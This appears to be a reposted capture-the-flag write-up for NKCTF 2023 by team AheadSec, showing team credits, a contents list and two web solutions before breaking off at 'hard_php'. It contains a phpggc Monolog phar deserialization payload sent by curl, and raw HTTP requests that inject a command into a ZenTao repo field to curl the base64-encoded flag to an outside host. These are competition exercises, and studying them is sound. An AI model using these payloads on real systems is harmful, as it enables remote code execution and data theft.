设为首页收藏本站
开启辅助访问

NKCTF 2023 Writeup By AheadSec

 您所在的位置:网站首页 write软件 NKCTF 2023 Writeup By AheadSec

NKCTF 2023 Writeup By AheadSec

#NKCTF 2023 Writeup By AheadSec| 来源: 网络整理| 查看: 265

感谢战队的每位同学,辛苦啦~

Web: Nacl、monkey111 Misc: Nacl、mochu7 Socal Engineering: Nacl、monkey111、mochu7 Crypto: range Pwn: gwoo、Helen Reverse: Helen

image.png

文章目录 Webwebpagetesteasy_pmshard_phpeazy_phpbaby_phpeasy_cmsxiaopi Mischard-miscblue三体THMastereasy_rgbeasy_wordfirst spam of rabbit yeareasy_bmpbaby_musiceasymusic Cryptoez_polynomial Reverseez_baby_apk Pwnez_shellcodea_story_of_a_pwner Social Engineering狂飙两个人的夜晚Bridge旅程的开始real-social-engineeringThe other BridgeFerris_Wheel

Web webpagetest

webpagetest反序列化 首先下载 https://github.com/ambionics/phpggc.git 然后需要去更改php.ini

[Phar] phar.readonly => Off

然后生成

./phpggc Monolog/RCE2 system 'cat /f*' -p phar -o testinfo.ini URLENC_PAYLOAD=$(cat /tmp/testinfo.ini | xxd -p | tr -d "\n" | sed "s#..#%&#g") curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=gadget' -d "ini=$URLENC_PAYLOAD" -o - curl -sSkig 'http://d44a0e24-e51d-4dae-976f-7583b5bcb409.node2.yuzhian.com.cn/runtest.php' -d 'rkey=phar:///var/www/html/results/gadget./testinfo.ini/foo' -d "ini=$URLENC_PAYLOAD" -o -

上面的命令一定要按顺序执行,并且不能报错 image.png

easy_pms

获取cookie

POST /repo-create.html HTTP/1.1 Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html Content-Length: 111 product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=

执行命令。回显长度不够,利用curl外带进行回显

POST /repo-edit-10000-10000.html HTTP/1.1 Host: b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate Accept: */* Connection: close Accept-Language: zh-CN,zh;q=0.9 Cookie: zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://b11ff344-b071-4efb-9e1b-ddc949f7a9fb.node.yuzhian.com.cn:8000//repo-edit-1-0.html Content-Length: 85 SCM=Subversion&client=`curl 1x.x.x.x:8080/\`cat /flag | sed -n '2p' | base64\``

image.png

hard_php


【本文地址】


今日新闻

推荐新闻

CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3